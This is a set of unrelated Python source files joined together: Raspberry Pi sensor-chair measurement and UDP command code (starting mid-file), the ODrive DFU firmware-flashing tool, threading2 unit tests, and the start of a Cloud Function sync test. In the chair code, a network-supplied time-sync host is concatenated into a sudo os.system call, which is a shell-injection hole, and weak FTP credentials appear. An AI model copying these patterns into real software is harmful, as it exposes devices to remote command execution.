# # measurement_data[i] = "%.3f" % measurement_data[i] # TODO: check in google why rounding isn't working
data2write = ','.join(measurement_data) + '\n'
file.write(data2write)
# measurement_data4server = [
# str(self.package_num), # n
# measurement_data[0][:-3], # microseconds are ignored
# ] + measurement_data[1:]
#
# # data2send = str(self.package_num) + ',' + ','.join(measurement_data) # New line character is not added
# data2send = ','.join(measurement_data4server) # New line character is not added
# if self.send_data:
# self.socket.sendto(data2send.encode(), self.response_address) # TODO: add number of row n
self.package_num += 1
if self.stop:
break
                if n_measurement != self.batch_size - 1:  # Skip the sleep on the last measurement so the time spent in file.close() is accounted for
time2sleep = self.get_sleep_time(self.timestep_detect)
time.sleep(time2sleep)
file.close()
ftp_filename = 'chair__' + first_datetime_in_batch + '.csv'
if self.send_data:
self.ftp_thread.send(filename, ftp_filename) # ftp_filename should be the 'chair_' + the first date. consider using already implemented functions
if self.stop:
break
time2sleep = self.get_sleep_time(self.timestep_detect)
time.sleep(time2sleep)
print('---------------------------')
print('----End of measurements----')
print('---------------------------')
class CmdThread(ListenerThread):
def __init__(self,
socket,
addresses,
status_thread,
time_thread,
# measurements_thread,
acknowledgement_thread,
mpu9250,
measurement_thread_kwargs,
ftp_thread,
player_id,
*args,
verbose=False,
sockets=None,
**kwargs):
super().__init__(socket, *args, verbose=verbose, **kwargs)
self.addresses = addresses
self.status_thread = status_thread
self.time_thread = time_thread
self.time_thread.periodic_sending = True
# self.measurements_thread = measurements_thread
self.acknowledgement_thread = acknowledgement_thread
self.mpu9250 = mpu9250
self.measurement_thread_kwargs = measurement_thread_kwargs
self.sockets = sockets
self.package_num = 0 # For measurements_thread
self.player_id = player_id
self.ftp_thread = ftp_thread
# self.last_ftp_file_prefix = None
# @staticmethod
def stop_measurements(self, measurements_thread):
print('Trying to stop')
if measurements_thread is None:
print('measurements_thread is None, please initialize it beforehand')
else:
measurements_thread.stop_measurements()
self.package_num = measurements_thread.package_num
measurements_thread.join()
print('Measurements thread is killed')
# def get_measurements_thread(self, socket, response_address, mpu9250, measurement_thread_kwargs):
# measurements_thread = MeasurementsThread(
# socket,
# response_address,
# mpu9250,
# **measurement_thread_kwargs,
# )
#
# return measurements_thread
@staticmethod
def time_sync(time_sync_source):
print('Synchronizing time')
os.system('sudo ntpdate ' + time_sync_source)
def run(self):
measurements_thread = None
measurements_threads_folders = []
time_sync_source = 'ntp1.stratum1.ru'
state = 'idle'
msg_num_last = None
while True:
# time.sleep(1)
# msg = '1'
# UDP_PORT = 61070
# # UDP_IP = "192.168.1.236"
# UDP_IP = "255.255.255.255"
# self.status_thread.send("4", (UDP_IP, UDP_PORT))
# print(i, time.time())
# time.sleep(0.1)
            msg, addr = self.socket.recvfrom(1024)  # buffer size is 1024 bytes # TODO: check which timeout applies here
msg = msg.decode()
print("received message:", msg)
print("sender:", addr)
# sender_ip = addr[0]
# response_address = (sender_ip, self.UDP_PORT_SEND)
# continue
msg_parts = msg.split(',')
try:
msg_num = int(msg_parts[0])
            except ValueError:
                print("Can't parse msg '" + msg + "'")
                continue
            # TODO: add acknowledgement responses
if msg_num == 1: # Reset
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num + ',' + __version__)
if (measurements_thread is not None) and measurements_thread.is_alive():
self.stop_measurements(measurements_thread)
measurements_thread = None
self.status_thread.periodic_sending = False
self.time_thread.periodic_sending = True # Changed to TRUE on 4 July
# self.time_thread.periodic_sending = False
self.package_num = 0
time_sync_source = 'ntp1.stratum1.ru'
state = 'idle'
elif msg_num == 2: # Start
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
time.sleep(0.050)
self.acknowledgement_thread.send(ack_response_num)
if (measurements_thread is not None) and measurements_thread.is_alive():
# self.stop_measurements(measurements_thread) ### IMPORTANT COMMENT. UNCOMMENT IF YOU WANT A SEPARATE FILE FOR EACH START
continue
measurements_thread = MeasurementsThread(
self.sockets['client']['data'], # It should be 'data' socket, right? # Also should be simplified
self.addresses['server']['data'],
# ('255.255.255.255', 63070),
# self.sockets['client']['data'], # It should be 'data' socket, right? # Also should be simplified
# self.addresses['server']['data'],
self.mpu9250,
self.ftp_thread,
# **self.measurement_thread_kwargs,
self.measurement_thread_kwargs,
package_num=self.package_num,
)
# measurements_thread = self.get_measurements_thread(
# socket=self.socket,
# response_address=self.addresses['server']['data'],
# mpu9250=self.mpu9250,
# measurement_thread_kwargs=self.measurement_thread_kwargs,
# )
# measurements_thread.stop = False
# measurements_thread = get_measurements_thread()
measurements_thread.start()
self.status_thread.periodic_sending = True
state = 'measuring'
measurements_threads_folders.append(measurements_thread.folder)
print('I am measuring')
elif msg_num == 3: # Stop
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
time.sleep(0.100)
self.acknowledgement_thread.send(ack_response_num)
self.stop_measurements(measurements_thread)
self.status_thread.periodic_sending = False
state = 'idle'
elif msg_num == 4: # Time sync
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num + ',0')
# print(self.acknowledgement_thread)
thread = Thread(target=self.time_sync, args=(time_sync_source, ))
thread.start()
elif msg_num == 5: # Time sync source
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num)
if len(msg_parts) >= 2:
new_time_sync_source = msg_parts[1]
try:
time_sync_source = str(new_time_sync_source)
except:
                        print('Failed to set the new time_sync_source')
elif msg_num == 6: # Start time sending # Looks like it's deprecated now
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num)
self.time_thread.periodic_sending = True
# Double check because of name
elif msg_num == 7: # State
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num + ',' + state)
elif msg_num == 8: # Send last measurement data
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num)
# TODO: add try/except
ftp_ip = msg_parts[1] # ftp_ip = '192.168.1.100'
# session_ftp = FTP('192.168.1.100', 'ADMIN', 'aaa')
for measurements_threads_folder in measurements_threads_folders:
folder = measurements_threads_folder
# session.login('ADMIN', 'aaa')
if folder is not None:
# os.listdir()
full_path = '/home/pi/data/' + folder + '/'
df_total = get_df_total(folder=full_path) # TODO: ENABLE IT
### df to bytes
path2save = '/home/pi/tmp/current_df.csv'
df_total.to_csv(path2save, index=False)
# file_prefix = folder[:19].replace(':', '-')
file_prefix = time_format2timefile_format(folder)
ftp_filename = 'chair__' + file_prefix + '.csv'
session_ftp = FTP(ftp_ip, self.player_id, self.player_id)
send_via_ftp(session_ftp, path2save, ftp_filename)
session_ftp.quit()
else:
                        print('Measurement folder is None; a folder with data files is required to send via FTP')
else:
measurements_threads_folders = []
elif msg_num == 9: # Looks like it's deprecated now
ack_response_num = str(msg_num) if msg_num != msg_num_last else '0'
for _ in range(1):
self.acknowledgement_thread.send(ack_response_num)
if len(msg_parts) != 3:
print('Incorrect number of parts: ' + str(len(msg_parts)))
continue
ip_server_new = msg_parts[1]
player_id_new = msg_parts[2]
ports, addresses, sockets = get_ports_adresses_sockets(channels_dict, '07', player_id_new, ip_server_new, get_server_sockets=False, get_client_sockets=False)
self.status_thread.opponent_address = addresses['server']['status']
self.time_thread.opponent_address = addresses['server']['time']
self.acknowledgement_thread.opponent_address = addresses['server']['ack']
if measurements_thread is not None:
# measurements_thread.socket = sockets['client']
measurements_thread.response_address = addresses['server']['data']
self.addresses = addresses
print('ip and player_id are updated to ' + ip_server_new + ' , ' + player_id_new)
# self.sockets = sockets
# self.socket = sockets['client']['cmd']
# get_socket(ip_server, ports['server'][channel_name]) # Add for client too
msg_num_last = msg_num
|
dfu.py
|
#!/usr/bin/env python
"""
Tool for flashing .hex files to the ODrive via the STM built-in USB DFU mode.
"""
from __future__ import print_function
import argparse
import sys
import time
import threading
import platform
import struct
import requests
import re
import io
import os
import usb.core
import fibre
import odrive
from odrive.utils import Event, OperationAbortedException
from odrive.dfuse import *
if sys.version_info < (3, 0):
_print = print
def print(*vals, **kwargs):
_print(*vals)
if kwargs.get('flush', False):
sys.stdout.flush()
try:
from intelhex import IntelHex
except ImportError:
sudo_prefix = "" if platform.system() == "Windows" else "sudo "
print("You need intelhex for this ({}pip install IntelHex)".format(sudo_prefix), file=sys.stderr)
sys.exit(1)
def get_fw_version_string(fw_version):
if (fw_version[0], fw_version[1], fw_version[2]) == (0, 0, 0):
return "[unknown version]"
else:
return "v{}.{}.{}{}".format(fw_version[0], fw_version[1], fw_version[2], "-dev" if fw_version[3] else "")
def get_hw_version_string(hw_version):
if hw_version == (0, 0, 0):
return "[unknown version]"
else:
return "v{}.{}{}".format(hw_version[0], hw_version[1], ("-" + str(hw_version[2]) + "V") if hw_version[2] > 0 else "")
def populate_sectors(sectors, hexfile):
"""
Checks for which on-device sectors there is data in the hex file and
returns a (sector, data) tuple for each touched sector where data
is a byte array of the same size as the sector.
"""
for sector in sectors:
addr = sector['addr']
size = sector['len']
# check if any segment from the hexfile overlaps with this sector
touched = False
for (start, end) in hexfile.segments():
if start < addr and end > addr:
touched = True
break
elif start >= addr and start < addr + size:
touched = True
break
if touched:
# TODO: verify if the section is writable
yield (sector, hexfile.tobinarray(addr, addr + size - 1))
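# Note (informal usage): callers typically consume this as
# list(populate_sectors(dfudev.sectors, hexfile)); only sectors that the hex image actually
# touches are yielded, each paired with a byte array covering the full sector.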
def get_first_mismatch_index(array1, array2):
"""
Compares two arrays and returns the index of the
first unequal item or None if both arrays are equal
"""
if len(array1) != len(array2):
raise Exception("arrays must be same size")
for pos in range(len(array1)):
if (array1[pos] != array2[pos]):
return pos
return None
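# Example (informal): get_first_mismatch_index([1, 2, 3], [1, 9, 3]) returns 1, two equal
# arrays return None, and arrays of different length raise an exception.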
def dump_otp(dfudev):
"""
Dumps the contents of the one-time-programmable
memory for debugging purposes.
The OTP is used to determine the board version.
"""
# 512 Byte OTP
otp_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7800][0]
data = dfudev.read_sector(otp_sector)
print(' '.join('{:02X}'.format(x) for x in data))
# 16 lock bytes
otp_lock_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7A00][0]
data = dfudev.read_sector(otp_lock_sector)
print(' '.join('{:02X}'.format(x) for x in data))
class Firmware():
def __init__(self):
self.fw_version = (0, 0, 0, True)
self.hw_version = (0, 0, 0)
@staticmethod
def is_newer(a, b):
a_num = (a[0], a[1], a[2])
b_num = (b[0], b[1], b[2])
if a_num == (0, 0, 0) or b_num == (0, 0, 0):
return False # Cannot compare unknown versions
return a_num > b_num or (a_num == b_num and not a[3] and b[3])
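    # Example (informal): is_newer((0, 4, 11, False), (0, 4, 11, True)) is True, since for an
    # equal version number a release build counts as newer than a prerelease; versions of
    # (0, 0, 0) never compare as newer because they are unknown.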
def __gt__(self, other):
"""
Compares two firmware versions. If both versions are equal, the
prerelease version is considered older than the release version.
"""
if not isinstance(other, tuple):
other = other.fw_version
return Firmware.is_newer(self.fw_version, other)
def __lt__(self, other):
"""
Compares two firmware versions. If both versions are equal, the
prerelease version is considered older than the release version.
"""
if not isinstance(other, tuple):
other = other.fw_version
return Firmware.is_newer(other, self.fw_version)
def is_compatible(self, hw_version):
"""
Determines if this firmware is compatible
with the specified hardware version
"""
return self.hw_version == hw_version
class FirmwareFromGithub(Firmware):
"""
Represents a firmware asset
"""
def __init__(self, release_json, asset_json):
Firmware.__init__(self)
if release_json['draft'] or release_json['prerelease']:
release_json['tag_name'] += "*"
self.fw_version = odrive.version.version_str_to_tuple(release_json['tag_name'])
        hw_version_regex = r'.*v([0-9]+)\.([0-9]+)(-(?P<voltage>[0-9]+)V)?\.hex'
hw_version_match = re.search(hw_version_regex, asset_json['name'])
self.hw_version = (int(hw_version_match.group(1)),
int(hw_version_match.group(2)),
int(hw_version_match.groupdict().get('voltage') or 0))
self.github_asset_id = asset_json['id']
self.hex = None
# no technical reason to fetch this - just interesting
self.download_count = asset_json['download_count']
def get_as_hex(self):
"""
Returns the content of the firmware in as a binary array in Intel Hex format
"""
if self.hex is None:
print("Downloading firmware {}...".format(get_fw_version_string(self.fw_version)))
response = requests.get('https://api.github.com/repos/madcowswe/ODrive/releases/assets/' + str(self.github_asset_id),
headers={'Accept': 'application/octet-stream'})
if response.status_code != 200:
raise Exception("failed to download firmware")
self.hex = response.content
return io.StringIO(self.hex.decode('utf-8'))
class FirmwareFromFile(Firmware):
def __init__(self, file):
Firmware.__init__(self)
self._file = file
def get_as_hex(self):
return self._file
def get_all_github_firmwares():
response = requests.get('https://api.github.com/repos/madcowswe/ODrive/releases')
if response.status_code != 200:
raise Exception("could not fetch releases")
response_json = response.json()
for release_json in response_json:
for asset_json in release_json['assets']:
try:
if asset_json['name'].lower().endswith('.hex'):
fw = FirmwareFromGithub(release_json, asset_json)
yield fw
except Exception as ex:
print(ex)
def get_newest_firmware(hw_version):
"""
Returns the newest available firmware for the specified hardware version
"""
firmwares = get_all_github_firmwares()
firmwares = filter(lambda fw: not fw.fw_version[3], firmwares) # ignore prereleases
firmwares = filter(lambda fw: fw.hw_version == hw_version, firmwares)
firmwares = list(firmwares)
firmwares.sort()
return firmwares[-1] if len(firmwares) else None
def show_deferred_message(message, cancellation_token):
"""
Shows a message after 10s, unless cancellation_token gets set.
"""
def show_message_thread(message, cancellation_token):
        for _ in range(10):
if cancellation_token.is_set():
return
time.sleep(1)
if not cancellation_token.is_set():
print(message)
t = threading.Thread(target=show_message_thread, args=(message, cancellation_token))
t.daemon = True
t.start()
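# Usage sketch (informal): show_deferred_message("Still waiting...", some_event) returns
# immediately and prints the message roughly ten seconds later from a daemon thread, unless
# some_event.is_set() becomes true first; "some_event" stands in for any Event-like object.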
def put_into_dfu_mode(device, cancellation_token):
"""
Puts the specified device into DFU mode
"""
if not hasattr(device, "enter_dfu_mode"):
print("The firmware on device {:08X} cannot soft enter DFU mode.\n"
"Please remove power, put the DFU switch into DFU mode,\n"
"then apply power again. Then try again.\n"
"If it still doesn't work, you can try to use the DeFuse app or \n"
"dfu-util, see the odrive documentation.\n"
"You can also flash the firmware using STLink (`make flash`)"
.format(device.serial_number))
return
print("Putting device {:08X} into DFU mode...".format(device.serial_number))
try:
device.enter_dfu_mode()
except fibre.ObjectLostError:
pass # this is expected because the device reboots
if platform.system() == "Windows":
show_deferred_message("Still waiting for the device to reappear.\n"
"Use the Zadig utility to set the driver of 'STM32 BOOTLOADER' to libusb-win32.",
cancellation_token)
def find_device_in_dfu_mode(serial_number, cancellation_token):
"""
Polls libusb until a device in DFU mode is found
"""
while not cancellation_token.is_set():
        params = {} if serial_number is None else {'serial_number': serial_number}
        stm_device = usb.core.find(idVendor=0x0483, idProduct=0xdf11, **params)
        if stm_device is not None:
return stm_device
time.sleep(1)
return None
def update_device(device, firmware, logger, cancellation_token):
"""
Updates the specified device with the specified firmware.
The device passed to this function can either be in
normal mode or in DFU mode.
The firmware should be an instance of Firmware or None.
If firmware is None, the newest firmware for the device is
downloaded from GitHub releases.
"""
if isinstance(device, usb.core.Device):
found_in_dfu = True
serial_number = device.serial_number
dfudev = DfuDevice(device)
if (logger._verbose):
logger.debug("OTP:")
dump_otp(dfudev)
# Read hardware version from one-time-programmable memory
otp_sector = [s for s in dfudev.sectors if s['name'] == 'OTP Memory' and s['addr'] == 0x1fff7800][0]
otp_data = dfudev.read_sector(otp_sector)
if otp_data[0] == 0:
otp_data = otp_data[16:]
if otp_data[0] == 0xfe:
hw_version = (otp_data[3], otp_data[4], otp_data[5])
else:
hw_version = (0, 0, 0)
else:
found_in_dfu = False
serial_number = "{:08X}".format(device.serial_number)
dfudev = None
# Read hardware version as reported from firmware
hw_version_major = device.hw_version_major if hasattr(device, 'hw_version_major') else 0
hw_version_minor = device.hw_version_minor if hasattr(device, 'hw_version_minor') else 0
hw_version_variant = device.hw_version_variant if hasattr(device, 'hw_version_variant') else 0
hw_version = (hw_version_major, hw_version_minor, hw_version_variant)
if hw_version < (3, 5, 0):
print(" DFU mode is not supported on board version 3.4 or earlier.")
print(" This is because entering DFU mode on such a device would")
print(" break the brake resistor FETs under some circumstances.")
print("Warning: DFU mode is not supported on ODrives earlier than v3.5 unless you perform a hardware mod.")
if not odrive.utils.yes_no_prompt("Do you still want to continue?", False):
raise OperationAbortedException()
fw_version_major = device.fw_version_major if hasattr(device, 'fw_version_major') else 0
fw_version_minor = device.fw_version_minor if hasattr(device, 'fw_version_minor') else 0
fw_version_revision = device.fw_version_revision if hasattr(device, 'fw_version_revision') else 0
fw_version_prerelease = device.fw_version_prerelease if hasattr(device, 'fw_version_prerelease') else True
fw_version = (fw_version_major, fw_version_minor, fw_version_revision, fw_version_prerelease)
print("Found ODrive {} ({}) with firmware {}{}".format(
serial_number,
get_hw_version_string(hw_version),
get_fw_version_string(fw_version),
" in DFU mode" if dfudev is not None else ""))
if firmware is None:
if hw_version == (0, 0, 0):
if dfudev is None:
suggestion = 'You have to manually flash an up-to-date firmware to make automatic checks work. Run `odrivetool dfu --help` for more info.'
else:
suggestion = 'Run "make write_otp" to program the board version.'
raise Exception('Cannot check online for new firmware because the board version is unknown. ' + suggestion)
print("Checking online for newest firmware...", end='')
firmware = get_newest_firmware(hw_version)
if firmware is None:
raise Exception("could not find any firmware release for this board version")
print(" found {}".format(get_fw_version_string(firmware.fw_version)))
if firmware.fw_version <= fw_version:
print()
if firmware.fw_version < fw_version:
print("Warning: you are about to flash firmware {} which is older than the firmware on the device ({}).".format(
get_fw_version_string(firmware.fw_version),
get_fw_version_string(fw_version)))
else:
print("You are about to flash firmware {} which is the same version as the firmware on the device ({}).".format(
get_fw_version_string(firmware.fw_version),
get_fw_version_string(fw_version)))
if not odrive.utils.yes_no_prompt("Do you want to flash this firmware anyway?", False):
raise OperationAbortedException()
# load hex file
# TODO: Either use the elf format or pack a custom format with a manifest.
# This way we can for instance verify the target board version and only
# have to publish one file for every board (instead of elf AND hex files).
hexfile = IntelHex(firmware.get_as_hex())
logger.debug("Contiguous segments in hex file:")
for start, end in hexfile.segments():
logger.debug(" {:08X} to {:08X}".format(start, end - 1))
# Back up configuration
do_backup_config = False
if dfudev is None:
do_backup_config = device.user_config_loaded if hasattr(device, 'user_config_loaded') else False
if do_backup_config:
odrive.configuration.backup_config(device, None, logger)
elif not odrive.utils.yes_no_prompt("The configuration cannot be backed up because the device is already in DFU mode. The configuration may be lost after updating. Do you want to continue anyway?", True):
raise OperationAbortedException()
# Put the device into DFU mode if it's not already in DFU mode
if dfudev is None:
find_odrive_cancellation_token = Event(cancellation_token)
put_into_dfu_mode(device, find_odrive_cancellation_token)
stm_device = find_device_in_dfu_mode(serial_number, cancellation_token)
find_odrive_cancellation_token.set()
dfudev = DfuDevice(stm_device)
logger.debug("Sectors on device: ")
for sector in dfudev.sectors:
logger.debug(" {:08X} to {:08X} ({})".format(
sector['addr'],
sector['addr'] + sector['len'] - 1,
sector['name']))
# fill sectors with data
touched_sectors = list(populate_sectors(dfudev.sectors, hexfile))
logger.debug("The following sectors will be flashed: ")
for sector,_ in touched_sectors:
logger.debug(" {:08X} to {:08X}".format(sector['addr'], sector['addr'] + sector['len'] - 1))
# Erase
try:
internal_flash_sectors = [sector for sector in dfudev.sectors if sector['name'] == 'Internal Flash']
for i, sector in enumerate(dfudev.sectors):
if sector['name'] == 'Internal Flash':
print("Erasing... (sector {}/{}) \r".format(i, len(internal_flash_sectors)), end='', flush=True)
dfudev.erase_sector(sector)
print('Erasing... done \r', end='', flush=True)
finally:
print('', flush=True)
# Flash
try:
for i, (sector, data) in enumerate(touched_sectors):
print("Flashing... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
dfudev.write_sector(sector, data)
print('Flashing... done \r', end='', flush=True)
finally:
print('', flush=True)
# Verify
try:
for i, (sector, expected_data) in enumerate(touched_sectors):
print("Verifying... (sector {}/{}) \r".format(i, len(touched_sectors)), end='', flush=True)
observed_data = dfudev.read_sector(sector)
mismatch_pos = get_first_mismatch_index(observed_data, expected_data)
            if mismatch_pos is not None:
mismatch_pos -= mismatch_pos % 16
observed_snippet = ' '.join('{:02X}'.format(x) for x in observed_data[mismatch_pos:mismatch_pos+16])
expected_snippet = ' '.join('{:02X}'.format(x) for x in expected_data[mismatch_pos:mismatch_pos+16])
raise RuntimeError("Verification failed around address 0x{:08X}:\n".format(sector['addr'] + mismatch_pos) +
" expected: " + expected_snippet + "\n"
" observed: " + observed_snippet)
print('Verifying... done \r', end='', flush=True)
finally:
print('', flush=True)
# If the flash operation failed for some reason, your device is bricked now.
# You can unbrick it as long as the device remains powered on.
# (or always with an STLink)
# So for debugging you should comment this last part out.
# Jump to application
dfudev.jump_to_application(0x08000000)
if not found_in_dfu:
logger.info("Waiting for the device to reappear...")
device = odrive.find_any(odrive.default_usb_search_path, serial_number,
cancellation_token, cancellation_token, timeout=30)
if do_backup_config:
temp_config_filename = odrive.configuration.get_temp_config_filename(device)
odrive.configuration.restore_config(device, None, logger)
os.remove(temp_config_filename)
logger.success("Device firmware update successful.")
def launch_dfu(args, logger, cancellation_token):
"""
Waits for a device that matches args.path and args.serial_number
and then upgrades the device's firmware.
"""
serial_number = args.serial_number
find_odrive_cancellation_token = Event(cancellation_token)
logger.info("Waiting for ODrive...")
devices = [None, None]
# Start background thread to scan for ODrives in DFU mode
def find_device_in_dfu_mode_thread():
devices[0] = find_device_in_dfu_mode(serial_number, find_odrive_cancellation_token)
find_odrive_cancellation_token.set()
t = threading.Thread(target=find_device_in_dfu_mode_thread)
t.daemon = True
t.start()
# Scan for ODrives not in DFU mode
# We only scan on USB because DFU is only implemented over USB
devices[1] = odrive.find_any(odrive.default_usb_search_path, serial_number,
find_odrive_cancellation_token, cancellation_token)
find_odrive_cancellation_token.set()
device = devices[0] or devices[1]
firmware = FirmwareFromFile(args.file) if args.file else None
update_device(device, firmware, logger, cancellation_token)
# Note: the flashed image can be verified using: (0x12000 is the number of bytes to read)
# $ openocd -f interface/stlink-v2.cfg -f target/stm32f4x.cfg -c init -c flash\ read_bank\ 0\ image.bin\ 0\ 0x12000 -c exit
# $ hexdump -C image.bin > image.bin.txt
#
# If you compare this with a reference image that was flashed with the STLink, you will see
# minor differences. This is because this script fills undefined sections with 0xff.
# $ diff image_ref.bin.txt image.bin.txt
# 21c21
# < *
# ---
# > 00000180 d9 47 00 08 d9 47 00 08 ff ff ff ff ff ff ff ff |.G...G..........|
# 2553c2553
# < 00009fc0 9e 46 70 47 00 00 00 00 52 20 96 3c 46 76 50 76 |.FpG....R .<FvPv|
# ---
# > 00009fc0 9e 46 70 47 ff ff ff ff 52 20 96 3c 46 76 50 76 |.FpG....R .<FvPv|
|
__init__.py
|
from __future__ import with_statement
import os
import sys
import unittest
import doctest
import random
import time
import threading2
from threading2 import *
# Grab everything needed to run standard threading test function
from threading import _test as std_threading_test
from threading import _Verbose, _sleep
from collections import deque
class TestStandard(unittest.TestCase):
"""Run standard threading testcases using our new classes."""
def test_standard(self):
exec std_threading_test.func_code in globals()
class TestSHLock(unittest.TestCase):
"""Testcases for SHLock class."""
def test_contention(self):
lock = SHLock()
done = []
def lots_of_acquires():
for _ in xrange(1000):
shared = random.choice([True,False])
lock.acquire(shared=shared)
lock.acquire(shared=shared)
time.sleep(random.random() * 0.0001)
lock.release()
time.sleep(random.random() * 0.0001)
lock.acquire(shared=shared)
time.sleep(random.random() * 0.0001)
lock.release()
lock.release()
done.append(True)
threads = [Thread(target=lots_of_acquires) for _ in xrange(3)]
for t in threads:
t.daemon = True
t.start()
for t in threads:
if not t.join(timeout=10):
raise RuntimeError("SHLock deadlock")
if len(done) != len(threads):
print done, threads
raise RuntimeError("SHLock test error")
class TestSHLockContext(unittest.TestCase):
class TestPassed(Exception): pass
@staticmethod
def raise_test_passed(): raise TestSHLockContext.TestPassed
@staticmethod
def noop(*args, **kwargs): pass
def check_args(self, passed, expected):
def f(**f_kwargs):
self.assertItemsEqual(expected.items(), f_kwargs.items(), 'Passed {} Got {} Expected {}'.format(passed, f_kwargs, expected))
raise TestSHLockContext.TestPassed
return f
def test_context_without_args(self):
lock_acquire = SHLock()
lock_acquire.acquire = TestSHLockContext.raise_test_passed
with self.assertRaises(TestSHLockContext.TestPassed):
with lock_acquire:
pass
lock_release = SHLock()
lock_release.release = TestSHLockContext.raise_test_passed
with self.assertRaises(TestSHLockContext.TestPassed):
with lock_release:
pass
def test_context_with_args(self):
for passed,expected in (
({}, {'shared':False, 'blocking':True, 'timeout':None}),
({'shared':True}, {'shared':True, 'blocking':True, 'timeout':None}),
({'blocking':False}, {'shared':False, 'blocking':False, 'timeout':None}),
({'timeout':1}, {'shared':False, 'blocking':True, 'timeout':1}),
):
lock_acquire_arg = SHLock()
lock_acquire_arg.acquire = self.check_args(passed, expected)
with self.assertRaises(TestSHLockContext.TestPassed):
with lock_acquire_arg(**passed):
pass
lock_release_arg = SHLock()
lock_acquire_arg.acquire = TestSHLockContext.noop
lock_release_arg.release = TestSHLockContext.raise_test_passed
with self.assertRaises(TestSHLockContext.TestPassed):
with lock_release_arg(**passed):
pass
class TestCPUSet(unittest.TestCase):
"""Unittests for CPUSet class."""
def test_initialisation(self):
def assertSetEquals(set1,set2):
self.assertEquals(sorted(list(set1)),sorted(list(set2)))
# Initialisation from iterables
assertSetEquals(CPUSet(),[])
assertSetEquals(CPUSet([0,3,2]),[0,2,3])
assertSetEquals(CPUSet(""),[])
assertSetEquals(CPUSet("3158"),[1,3,5,8])
assertSetEquals(CPUSet("3158"),[1,3,5,8])
# Initialisation from bitmasks
assertSetEquals(CPUSet(0),[])
assertSetEquals(CPUSet(1),[0])
assertSetEquals(CPUSet(2),[1])
assertSetEquals(CPUSet(3),[0,1])
assertSetEquals(CPUSet(4),[2])
assertSetEquals(CPUSet(5),[0,2])
assertSetEquals(CPUSet(6),[1,2])
assertSetEquals(CPUSet(7),[0,1,2])
assertSetEquals(CPUSet(1 << 7),[7])
assertSetEquals(CPUSet(1 << 127),[127])
assertSetEquals(CPUSet(1 << 128),[128])
def test_to_bitmask(self):
self.assertEquals(CPUSet().to_bitmask(),0)
self.assertEquals(CPUSet("0").to_bitmask(),1)
self.assertEquals(CPUSet("1").to_bitmask(),2)
self.assertEquals(CPUSet("01").to_bitmask(),3)
self.assertEquals(CPUSet("2").to_bitmask(),4)
self.assertEquals(CPUSet("02").to_bitmask(),5)
self.assertEquals(CPUSet("12").to_bitmask(),6)
self.assertEquals(CPUSet("012").to_bitmask(),7)
for i in xrange(100):
self.assertEquals(CPUSet(i).to_bitmask(),i)
class TestMisc(unittest.TestCase):
"""Miscellaneous test procedures."""
def test_docstrings(self):
"""Test threading2 docstrings."""
assert doctest.testmod(threading2)[0] == 0
def test_README(self):
"""Ensure that the README is in sync with the docstring.
This test should always pass; if the README is out of sync it just
updates it with the contents of threading2.__doc__.
"""
dirname = os.path.dirname
readme = os.path.join(dirname(dirname(dirname(__file__))),"README.txt")
if not os.path.isfile(readme):
f = open(readme,"wb")
f.write(threading2.__doc__)
f.close()
else:
f = open(readme,"rb")
if f.read() != threading2.__doc__:
f.close()
f = open(readme,"wb")
f.write(threading2.__doc__)
f.close()
|
main_test.py
|
# Copyright 2020 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
################################################################################
"""Unit tests for Cloud Function sync, which syncs the list of github projects
and uploads them to the Cloud Datastore."""
from collections import namedtuple
import os
import subprocess
import threading
import unittest
import requests
from google.cloud import ndb
from main import get_access_token
from main import get_projects
from main import sync_projects
from main import Project
_EMULATOR_TIMEOUT = 20
_DATASTORE_READY_INDICATOR = b'is now running'
_DATASTORE_EMULATOR_PORT = 8432
_TEST_PROJECT_ID = 'test-project'
ProjectMetadata = namedtuple('ProjectMetadata', 'schedule')
def start_datastore_emulator():
"""Start Datastore emulator."""
return subprocess.Popen([
'gcloud',
'beta',
'emulators',
'datastore',
'start',
'--consistency=1.0',
'--host-port=localhost:' + str(_DATASTORE_EMULATOR_PORT),
'--project=' + _TEST_PROJECT_ID,
'--no-store-on-disk',
],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
def _wait_for_emulator_ready(proc,
emulator,
indicator,
timeout=_EMULATOR_TIMEOUT):
"""Wait for emulator to be ready."""
def _read_thread(proc, ready_event):
"""Thread to continuously read from the process stdout."""
ready = False
while True:
line = proc.stdout.readline()
if not line:
break
if not ready and indicator in line:
ready = True
ready_event.set()
# Wait for process to become ready.
ready_event = threading.Event()
thread = threading.Thread(target=_read_thread, args=(proc, ready_event))
thread.daemon = True
thread.start()
if not ready_event.wait(timeout):
raise RuntimeError(
'{} emulator did not get ready in time.'.format(emulator))
return thread
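# Note (informal): TestDataSync.setUpClass below uses this helper by passing the emulator
# process, a human-readable emulator name and the readiness indicator bytes; a RuntimeError
# is raised if the indicator never appears on stdout within the timeout.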
# pylint: disable=too-few-public-methods
class Repository:
"""Mocking Github Repository."""
def __init__(self, name, file_type, path, contents=None):
self.contents = contents or []
self.name = name
self.type = file_type
self.path = path
self.decoded_content = b"name: test"
def get_contents(self, path):
""""Get contents of repository."""
if self.path == path:
return self.contents
for content_file in self.contents:
if content_file.path == path:
return content_file.contents
return None
def set_yaml_contents(self, decoded_content):
